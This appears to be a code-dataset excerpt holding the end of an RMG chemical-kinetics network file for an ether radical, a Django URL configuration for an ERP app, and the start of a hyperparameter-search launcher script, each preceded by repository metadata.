SMILES('N#N'), E0 = (-8.69489,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (28.0135,'amu'), collisionModel = TransportData(shapeIndex=1, epsilon=(810.913,'J/mol'), sigma=(3.621,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(1.76,'angstroms^3'), rotrelaxcollnum=4.0, comment="""PrimaryTransportLibrary"""), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.61263,-0.00100893,2.49898e-06,-1.43376e-09,2.58636e-13,-1051.1,2.6527], Tmin=(100,'K'), Tmax=(1817.04,'K')), NASAPolynomial(coeffs=[2.9759,0.00164141,-7.19722e-07,1.25378e-10,-7.91526e-15,-1025.84,5.53757], Tmin=(1817.04,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-8.69489,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""N2""", comment="""Thermo library: BurkeH2O2"""), ) species( label = 'Ne', structure = SMILES('[Ne]'), E0 = (-6.19738,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (20.1797,'amu'), collisionModel = TransportData(shapeIndex=0, epsilon=(1235.53,'J/mol'), sigma=(3.758e-10,'m'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with fixed Lennard Jones Parameters. This is the fallback method! Try improving transport databases!"""), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""Ne""", comment="""Thermo library: primaryThermoLibrary"""), ) transitionState( label = 'TS1', E0 = (69.8904,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS2', E0 = (100.754,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS3', E0 = (241.483,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS4', E0 = (193.461,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS5', E0 = (342.512,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS6', E0 = (97.1854,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS7', E0 = (223.155,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS8', E0 = (255.307,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS9', E0 = (259.387,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS10', E0 = (391.012,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS11', E0 = (227.624,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS12', E0 = (282.728,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS13', E0 = (338.084,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS14', E0 = (186.553,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS15', E0 = (223.976,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS16', E0 = (279.821,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS17', E0 = (273.713,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS18', E0 = (397.665,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS19', E0 = (295.826,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS20', E0 = (96.2496,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS21', E0 = (133.291,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS22', E0 = (109.115,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS23', E0 = (78.2584,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS24', E0 = (523.142,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS25', E0 = (330.774,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS26', E0 = (78.1747,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS27', E0 = (478.398,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS28', E0 = (464.193,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS29', E0 = (174.021,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS30', E0 = (277.622,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS31', E0 = (338.063,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS32', E0 = (191.494,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS33', E0 = (179.469,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS34', E0 = (204.457,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS35', E0 = (213.068,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS36', E0 = (94.8636,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS37', E0 = (77.4216,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) transitionState( label = 'TS38', E0 = (602.501,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, ) reaction( label = 'reaction1', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['C=CC=CC(381)', 'CH3CHO(52)'], transitionState = 'TS1', kinetics = Arrhenius(A=(5e+12,'s^-1'), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""Exact match found for rate rule [RJJ] Euclidian distance = 0 family: 1,4_Linear_birad_scission"""), ) reaction( label = 'reaction2', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['[CH2]C1[CH]C(C)OC1C(3810)'], transitionState = 'TS2', kinetics = Arrhenius(A=(187000,'s^-1'), n=1.48, Ea=(30.8638,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2500,'K'), comment="""Estimated using an average for rate rule [R6;doublebond_intra_2H_pri;radadd_intra_csHNd] Euclidian distance = 0 family: Intra_R_Add_Exocyclic Ea raised from 23.9 to 30.9 kJ/mol to match endothermicity of reaction."""), ) reaction( label = 'reaction3', reactants = ['H(19)', 'C=CC=C(C)O[CH]C(3811)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS3', kinetics = Arrhenius(A=(170.641,'m^3/(mol*s)'), n=1.56204, Ea=(11.2897,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [Cds_Cds;HJ] for rate rule [Cds-OsCs_Cds;HJ] Euclidian distance = 1.0 family: R_Addition_MultipleBond"""), ) reaction( label = 'reaction4', reactants = ['H(19)', 'C=C[CH]C(C)OC=C(3812)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS4', kinetics = Arrhenius(A=(6.67e+12,'cm^3/(mol*s)'), n=0.1, Ea=(6.4601,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2000,'K'), comment="""From training reaction 2816 used for Cds-HH_Cds-OsH;HJ Exact match found for rate rule [Cds-HH_Cds-OsH;HJ] Euclidian distance = 0 family: R_Addition_MultipleBond"""), ) reaction( label = 'reaction5', reactants = ['H(19)', 'C=C=CC(C)O[CH]C(3813)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS5', kinetics = Arrhenius(A=(5.46e+08,'cm^3/(mol*s)'), n=1.64, Ea=(15.8155,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 2714 used for Ca_Cds-CsH;HJ Exact match found for rate rule [Ca_Cds-CsH;HJ] Euclidian distance = 0 family: R_Addition_MultipleBond"""), ) reaction( label = 'reaction6', reactants = ['CH3CHO(52)', '[CH2]C=C[CH]C(377)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS6', kinetics = Arrhenius(A=(4e+09,'cm^3/(mol*s)'), n=1.39, Ea=(35.8862,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2000,'K'), comment="""Estimated using template [Od_CO-CsH;YJ] for rate rule [Od_CO-CsH;CJ] Euclidian distance = 1.0 family: R_Addition_MultipleBond"""), ) reaction( label = 'reaction7', reactants = ['CH3(34)', 'C=CC=CO[CH]C(3814)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS7', kinetics = Arrhenius(A=(0.0063345,'m^3/(mol*s)'), n=2.46822, Ea=(26.7748,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [Cds_Cds;CsJ-HHH] for rate rule [Cds-OsH_Cds;CsJ-HHH] Euclidian distance = 1.0 family: R_Addition_MultipleBond"""), ) reaction( label = 'reaction8', reactants = ['C=CC[C](C)O[CH]C(3815)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS8', kinetics = Arrhenius(A=(20108.5,'s^-1'), n=2.606, Ea=(121.63,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R2H_S;C_rad_out_NonDe;Cs_H_out_H/Cd] for rate rule [R2H_S;C_rad_out_NDMustO;Cs_H_out_H/Cd] Euclidian distance = 1.0 Multiplied by reaction path degeneracy 2.0 family: intra_H_migration"""), ) reaction( label = 'reaction9', reactants = ['[CH2]COC(C)[CH]C=C(3816)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS9', kinetics = Arrhenius(A=(3.7e+13,'s^-1','+|-',2), n=-0.1, Ea=(158.364,'kJ/mol'), T0=(1,'K'), Tmin=(700,'K'), Tmax=(1800,'K'), comment="""From training reaction 347 used for R2H_S;C_rad_out_2H;Cs_H_out_H/NonDeO Exact match found for rate rule [R2H_S;C_rad_out_2H;Cs_H_out_H/NonDeO] Euclidian distance = 0 Multiplied by reaction path degeneracy 2.0 family: intra_H_migration"""), ) reaction( label = 'reaction10', reactants = ['C=[C]CC(C)O[CH]C(3817)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS10', kinetics = Arrhenius(A=(1.9054e+11,'s^-1'), n=0.853, Ea=(200.196,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [R2H_S;Cd_rad_out_Cd;Cs_H_out_H/(NonDeC/Cs)] Euclidian distance = 0 Multiplied by reaction path degeneracy 2.0 family: intra_H_migration"""), ) reaction( label = 'reaction11', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['C=C[CH][C](C)OCC(3818)'], transitionState = 'TS11', kinetics = Arrhenius(A=(1.2544e+06,'s^-1'), n=1.86276, Ea=(157.734,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R3H_SS;C_rad_out_H/NonDeC;XH_out] for rate rule [R3H_SS_O;C_rad_out_H/NonDeC;XH_out] Euclidian distance = 1.0 family: intra_H_migration"""), ) reaction( label = 'reaction12', reactants = ['[CH2]C(CC=C)O[CH]C(3819)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS12', kinetics = Arrhenius(A=(25000,'s^-1'), n=2.28, Ea=(119.244,'kJ/mol'), T0=(1,'K'), comment="""From training reaction 85 used for R3H_SS_Cs;C_rad_out_2H;Cs_H_out_H/Cd Exact match found for rate rule [R3H_SS_Cs;C_rad_out_2H;Cs_H_out_H/Cd] Euclidian distance = 0 Multiplied by reaction path degeneracy 2.0 family: intra_H_migration"""), ) reaction( label = 'reaction13', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['[CH]=CCC(C)O[CH]C(3820)'], transitionState = 'TS13', kinetics = Arrhenius(A=(8.32e+10,'s^-1'), n=0.77, Ea=(268.194,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 195 used for R3H_SD;C_rad_out_H/NonDeC;Cd_H_out_singleH Exact match found for rate rule [R3H_SD;C_rad_out_H/NonDeC;Cd_H_out_singleH] Euclidian distance = 0 Multiplied by reaction path degeneracy 2.0 family: intra_H_migration"""), ) reaction( label = 'reaction14', reactants = ['[CH2]C=CC([CH2])OCC(3772)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS14', kinetics = Arrhenius(A=(6.44e+09,'s^-1'), n=0.13, Ea=(86.6088,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 131 used for R4H_SSS;C_rad_out_2H;Cs_H_out_H/NonDeC Exact match found for rate rule [R4H_SSS;C_rad_out_2H;Cs_H_out_H/NonDeC] Euclidian distance = 0 Multiplied by reaction path degeneracy 2.0 family: intra_H_migration"""), ) reaction( label = 'reaction15', reactants = ['[CH2][CH]OC(C)CC=C(3821)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS15', kinetics = Arrhenius(A=(62296.1,'s^-1'), n=1.86, Ea=(59.4128,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R5Hall;C_rad_out_2H;Cs_H_out_H/Cd] for rate rule [R5HJ_1;C_rad_out_2H;Cs_H_out_H/Cd] Euclidian distance = 1.0 Multiplied by reaction path degeneracy 2.0 family: intra_H_migration"""), ) reaction( label = 'reaction16', reactants = ['C=[C][CH]C(C)OCC(3822)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS16', kinetics = Arrhenius(A=(2.54505e+10,'s^-1'), n=0.959062, Ea=(152.545,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [RnH;Cd_rad_out_Cd;Cs_H_out_H/NonDeC] for rate rule [R5HJ_1;Cd_rad_out_Cd;Cs_H_out_H/NonDeC] Euclidian distance = 2.0 Multiplied by reaction path degeneracy 2.0 family: intra_H_migration"""), ) reaction( label = 'reaction17', reactants = ['[CH]=C[CH]C(C)OCC(3823)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS17', kinetics = Arrhenius(A=(1.846e+10,'s^-1'), n=0.74, Ea=(145.185,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""Estimated using template [RnH;Cd_rad_out_singleH;Cs_H_out_H/NonDeC] for rate rule [R6HJ_2;Cd_rad_out_singleH;Cs_H_out_H/NonDeC] Euclidian distance = 2.0 Multiplied by reaction path degeneracy 2.0 family: intra_H_migration"""), ) reaction( label = 'reaction18', reactants = ['[CH2]C=C[CH]C(377)', 'C[CH][O](2420)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS18', kinetics = Arrhenius(A=(7.35017e+06,'m^3/(mol*s)'), n=0.0284742, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Y_rad;Y_rad] Euclidian distance = 0 family: R_Recombination Ea raised from -14.4 to 0 kJ/mol."""), ) reaction( label = 'reaction19', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['C[CH]OC(C)C1[CH]C1(3824)'], transitionState = 'TS19', kinetics = Arrhenius(A=(1.05e+08,'s^-1'), n=1.192, Ea=(225.936,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R3_D;doublebond_intra_pri;radadd_intra_cs] for rate rule [R3_D;doublebond_intra_pri_2H;radadd_intra_csHCs] Euclidian distance = 2.2360679775 family: Intra_R_Add_Endocyclic"""), ) reaction( label = 'reaction20', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['CC1[CH][CH]CC(C)O1(3825)'], transitionState = 'TS20', kinetics = Arrhenius(A=(487000,'s^-1'), n=1.17, Ea=(26.3592,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2500,'K'), comment="""Estimated using an average for rate rule [R6_linear;doublebond_intra_pri_2H;radadd_intra_csHCs] Euclidian distance = 0 family: Intra_R_Add_Endocyclic"""), ) reaction( label = 'reaction21', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['C=CC=C(C)OCC(3826)'], transitionState = 'TS21', kinetics = Arrhenius(A=(7.437e+08,'s^-1'), n=1.045, Ea=(63.4002,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R3radExo;Y_rad_NDe;XH_Rrad] for rate rule [R3radExo;Y_rad_NDe;XH_Rrad_De] Euclidian distance = 1.0 family: Intra_Disproportionation"""), ) reaction( label = 'reaction22', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['C=CCC(C)OC=C(3827)'], transitionState = 'TS22', kinetics = Arrhenius(A=(5.55988e+09,'s^-1'), n=0.137, Ea=(39.225,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R5;Y_rad_De;XH_Rrad] for rate rule [R5radEndo;Y_rad_De;XH_Rrad] Euclidian distance = 1.0 Multiplied by reaction path degeneracy 3.0 family: Intra_Disproportionation"""), ) reaction( label = 'reaction23', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['C=C=CC(C)OCC(3828)'], transitionState = 'TS23', kinetics = Arrhenius(A=(3.21e+09,'s^-1'), n=0.137, Ea=(8.368,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""Estimated using template [R5;Y_rad_NDe;XH_Rrad] for rate rule [R5radEndo;Y_rad_NDe;XH_Rrad] Euclidian distance = 1.0 family: Intra_Disproportionation"""), ) reaction( label = 'reaction24', reactants = ['CH2(S)(40)', 'C=C[CH]CO[CH]C(3798)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS24', kinetics = Arrhenius(A=(143764,'m^3/(mol*s)'), n=0.444, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [carbene;R_H] Euclidian distance = 0 Multiplied by reaction path degeneracy 2.0 family: 1,2_Insertion_carbene Ea raised from -5.1 to 0 kJ/mol."""), ) reaction( label = 'reaction25', reactants = ['C=CC(C)[CH]O[CH]C(3829)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS25', kinetics = Arrhenius(A=(5.59192e+09,'s^-1'), n=1.025, Ea=(194.765,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [cCs(-HC)CJ;CsJ;CH3] Euclidian distance = 0 family: 1,2_shiftC"""), ) reaction( label = 'reaction26', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['C=CC1C(C)OC1C(2310)'], transitionState = 'TS26', kinetics = Arrhenius(A=(1.62e+12,'s^-1'), n=-0.305, Ea=(8.28432,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R4_SSS;C_rad_out_single;Cpri_rad_out_single] for rate rule [R4_SSS;C_rad_out_H/NonDeC;Cpri_rad_out_H/OneDe] Euclidian distance = 2.82842712475 family: Birad_recombination"""), ) reaction( label = 'reaction27', reactants = ['CHCH3(T)(359)', 'C=C[CH]C(C)[O](3162)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS27', kinetics = Arrhenius(A=(54738.4,'m^3/(mol*s)'), n=0.884925, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(303.03,'K'), Tmax=(2000,'K'), comment="""Estimated using an average for rate rule [O_rad/NonDe;Birad] Euclidian distance = 0 family: Birad_R_Recombination Ea raised from -2.9 to 0 kJ/mol."""), ) reaction( label = 'reaction28', reactants = ['[CH]=C[CH2](321)', 'C[CH]O[CH]C(3586)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS28', kinetics = Arrhenius(A=(4.4725e+06,'m^3/(mol*s)'), n=0.36814, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [Y_rad;Birad] for rate rule [C_rad/H/CsO;Birad] Euclidian distance = 4.0 Multiplied by reaction path degeneracy 2.0 family: Birad_R_Recombination Ea raised from -1.7 to 0 kJ/mol."""), ) reaction( label = 'reaction29', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['[CH2][CH]C1C(C)OC1C(3830)'], transitionState = 'TS29', kinetics = Arrhenius(A=(4.73e+06,'s^-1'), n=1.31, Ea=(104.13,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2500,'K'), comment="""Estimated using an average for rate rule [R5_SS_D;doublebond_intra;radadd_intra_csHNd] Euclidian distance = 0 family: Intra_R_Add_Exocyclic Ea raised from 98.9 to 104.1 kJ/mol to match endothermicity of reaction."""), ) reaction( label = 'reaction30', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['C[C]=CC(C)O[CH]C(3769)'], transitionState = 'TS30', kinetics = Arrhenius(A=(1.63e+08,'s^-1'), n=1.73, Ea=(207.731,'kJ/mol'), T0=(1,'K'), comment="""From training reaction 123 used for R2H_S;C_rad_out_2H;Cd_H_out_doubleC Exact match found for rate rule [R2H_S;C_rad_out_2H;Cd_H_out_doubleC] Euclidian distance = 0 family: intra_H_migration"""), ) reaction( label = 'reaction31', reactants = ['C[CH]OC(C)[C]=CC(3767)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS31', kinetics = Arrhenius(A=(7.74e+09,'s^-1'), n=1.08, Ea=(161.921,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 198 used for R3H_DS;Cd_rad_out_Cs;Cs_H_out_2H Exact match found for rate rule [R3H_DS;Cd_rad_out_Cs;Cs_H_out_2H] Euclidian distance = 0 Multiplied by reaction path degeneracy 3.0 family: intra_H_migration"""), ) reaction( label = 'reaction32', reactants = ['[CH2]C=[C]C(C)OCC(3831)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS32', kinetics = Arrhenius(A=(74200,'s^-1'), n=2.23, Ea=(44.3086,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R4H_RSS;Cd_rad_out;Cs_H_out_1H] for rate rule [R4H_SSS;Cd_rad_out_Cd;Cs_H_out_H/NonDeC] Euclidian distance = 2.44948974278 Multiplied by reaction path degeneracy 2.0 family: intra_H_migration"""), ) reaction( label = 'reaction33', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['C[CH]O[C](C)C=CC(3764)'], transitionState = 'TS33', kinetics = Arrhenius(A=(1.86e+10,'s^-1'), n=0.58, Ea=(109.579,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R4H;C_rad_out_2H;Cs_H_out_NonDe] for rate rule [R4H_SDS;C_rad_out_2H;Cs_H_out_NDMustO] Euclidian distance = 2.2360679775 family: intra_H_migration"""), ) reaction( label = 'reaction16', reactants = ['[CH2]C(C=CC)O[CH]C(2304)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS34', kinetics = Arrhenius(A=(121000,'s^-1'), n=1.9, Ea=(55.6472,'kJ/mol'), T0=(1,'K'), comment="""From training reaction 92 used for R5H_SSMS;C_rad_out_2H;Cs_H_out_2H Exact match found for rate rule [R5H_SSMS;C_rad_out_2H;Cs_H_out_2H] Euclidian distance = 0 Multiplied by reaction path degeneracy 3.0 family: intra_H_migration"""), ) reaction( label = 'reaction35', reactants = ['[CH2][CH]OC(C)C=CC(3770)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS35', kinetics = Arrhenius(A=(64.2,'s^-1'), n=2.1, Ea=(63.1784,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R7Hall;C_rad_out_2H;Cs_H_out_2H] for rate rule [R7HJ_1;C_rad_out_2H;Cs_H_out_2H] Euclidian distance = 1.0 Multiplied by reaction path degeneracy 3.0 family: intra_H_migration"""), ) reaction( label = 'reaction36', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['C=COC(C)C=CC(3776)'], transitionState = 'TS36', kinetics = Arrhenius(A=(6.37831e+09,'s^-1'), n=0.137, Ea=(24.9733,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R7;Y_rad;XH_Rrad] for rate rule [R7radEndo;Y_rad;XH_Rrad] Euclidian distance = 1.0 Multiplied by reaction path degeneracy 3.0 family: Intra_Disproportionation"""), ) reaction( label = 'reaction37', reactants = ['C=C[CH]C(C)O[CH]C(2302)'], products = ['CC1C=CCC(C)O1(2305)'], transitionState = 'TS37', kinetics = Arrhenius(A=(2e+12,'s^-1'), n=0, Ea=(7.5312,'kJ/mol'), T0=(1,'K'), Tmin=(550,'K'), Tmax=(650,'K'), comment="""Estimated using template [R6_SSSDS;C_rad_out_1H;Cpri_rad_out_2H] for rate rule [R6_SSSDS;C_rad_out_H/NonDeC;Cpri_rad_out_2H] Euclidian distance = 1.0 family: Birad_recombination"""), ) reaction( label = 'reaction38', reactants = ['CH2(T)(33)', '[CH]=CC(C)O[CH]C(3832)'], products = ['C=C[CH]C(C)O[CH]C(2302)'], transitionState = 'TS38', kinetics = Arrhenius(A=(2.23625e+06,'m^3/(mol*s)'), n=0.36814, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [Y_rad;Birad] for rate rule [Cd_pri_rad;Birad] Euclidian distance = 2.0 family: Birad_R_Recombination Ea raised from -1.7 to 0 kJ/mol."""), ) network( label = '556', isomers = [ 'C=C[CH]C(C)O[CH]C(2302)', ], reactants = [ ('C=CC=CC(381)', 'CH3CHO(52)'), ], bathGas = { 'N2': 0.5, 'Ne': 0.5, }, ) pressureDependence( label = '556', Tmin = (300,'K'), Tmax = (2000,'K'), Tcount = 8, Tlist = ([302.47,323.145,369.86,455.987,609.649,885.262,1353.64,1896.74],'K'), Pmin = (0.01,'bar'), Pmax = (100,'bar'), Pcount = 5, Plist = ([0.0125282,0.0667467,1,14.982,79.8202],'bar'), maximumGrainSize = (0.5,'kcal/mol'), minimumGrainCount = 250, method = 'modified strong collision', interpolationModel = ('Chebyshev', 6, 4), activeKRotor = True, activeJRotor = True, rmgmode = True, )
afc614636a168d512fd7a9da31c0dc42b2a9191f
afc4e63338fcb6538117ab2da3ebeb7b6d485399
/campoapp/cedis/urls.py
7b9a3a3c63a8bfbeeffb7c13b8791bc8046c038a
[]
no_license
alrvivas/cedis-erp
7531108ba4dd2212788cb6d108ccacdce42d4b37
aa7d3c5d844473b72786ee6168f9b3a71be349f2
refs/heads/master
2022-11-25T14:21:40.365438
2018-09-28T18:06:41
2018-09-28T18:06:41
146,667,529
0
0
null
2022-11-22T02:52:27
2018-08-29T22:52:30
JavaScript
UTF-8
Python
false
false
725
py
from django.conf.urls import url from django.urls import path,re_path from .views import ( CedisView, CedisCreation, RouteCedis, RouteCreation, ClientRoute, ) app_name = 'cedis' urlpatterns = [ path('', CedisView.as_view(), name='cedis'), re_path(r'^nuevo$', CedisCreation.as_view(), name='new'), path('<slug:slug>/', RouteCedis.as_view(), name='cedis_detail'), #re_path(r'^nueva-ruta$', RouteCreation.as_view(), name='new_route'), re_path(r'^(?P<slug>[\w-]+)/nueva-ruta/$', RouteCreation.as_view(), name='new_route'), path('route/<slug:slug>/', ClientRoute.as_view(), name='route_detail'), #re_path(r'^(?P<slug:slug>[-\w]+)/$', RouteCedis.as_view(), name='cedis_detail'), ]
56c2adbfffabb89ea6c69a685d01c01d8098d791
235de1014c7aa9b05ee3c9cce2e7557c6406f800
/Rationale_Analysis/experiments/hyperparam_search.py
d61afcd61a83d2afaa5a437ea45f96894e5a8e2c
[ "MIT" ]
permissive
yuvalpinter/rationale_analysis
b07336142e7de932238a3cc07c656e6616c0e717
2b25c6027d4459fc27e0f6793da6fee695e409a9
refs/heads/master
2020-09-11T08:16:15.031620
2019-11-17T23:25:11
2019-11-17T23:25:11
222,000,886
0
0
MIT
2019-11-15T20:48:41
2019-11-15T20:48:41
null
UTF-8
Python
false
false
1,617
py
import argparse import os import json import subprocess import hyperopt from hyperopt import hp import numpy as np np.exp = lambda x : 10**x parser = argparse.ArgumentParser() parser.add_argument("--exp-name", type=str, required=True) parser.add_argument("--search-space-file", type=str, required=True) parser.add_argument("--dry-run", dest="dry_run", action="store_true") parser.add_argument("--cluster", dest="cluster", action="store_true") parser.add_argument('--run-one', dest='run_one', action='store_true') parser.add_argument('--num-searches', type=int, required=True) def main(args): global_exp_name = args.exp_name search_space_config = json.load(open(args.search_space_file)) hyperparam_space = {k:eval(v['type'])(k, **v['options']) for k, v in search_space_config.items()} for i in range(args.num_searches) : new_env = os.environ.copy() hyperparam_vals = hyperopt.pyll.stochastic.sample(hyperparam_space) for k, v in hyperparam_vals.items(): new_env[k] = str(v) print(hyperparam_vals) exp_name = os.path.join(global_exp_name, "search_" + str(i)) new_env["EXP_NAME"] = exp_name cmd = ["bash", "Rationale_Analysis/commands/model_a_train_script.sh"] if args.cluster: cmd = ["sbatch", "Cluster_scripts/multi_gpu_sbatch.sh"] + cmd print("Running ", 